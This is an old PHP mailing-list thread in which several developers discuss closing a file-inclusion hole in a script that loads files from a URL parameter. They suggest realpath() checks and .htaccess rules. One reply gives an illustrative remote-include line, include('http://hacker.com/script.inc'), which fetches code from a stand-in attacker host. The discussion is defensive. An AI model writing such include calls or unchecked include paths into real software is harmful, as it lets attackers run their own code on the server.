all my include files are *.inc, and I have a .htaccess file that makes apache refuse to serve those files directly thru http.
Justin on 04/10/02 7:58 PM, John Wards ([EMAIL PROTECTED]) wrote: > erm......would that alow hackers access? Say I have a database include file > would hackers be able to get access to my database like this? > > (include('http://mysite.com/datainc.php');) > > I hope bloody not!!! if so how on earth do i get round that! > > John > > On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote: >> Use realpath() to check the path. I also suspect your script is >> vulnarable to cross-site includes >> (include('http://hacker.com/script.inc');) >> >> Rick Beckman wrote: >>> Okay, I was mistaken... There is a gaping security hole in my simple li'l >>> script... How do I modify it to only accept files from a certain path? I >>> want the url format to be script.php?call=1 where "1" is the called file >>> in the /includes/ directory. Just when I get optimistic I leave the >>> entire system exposed. Yeah, that fits with my luck. :-) > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php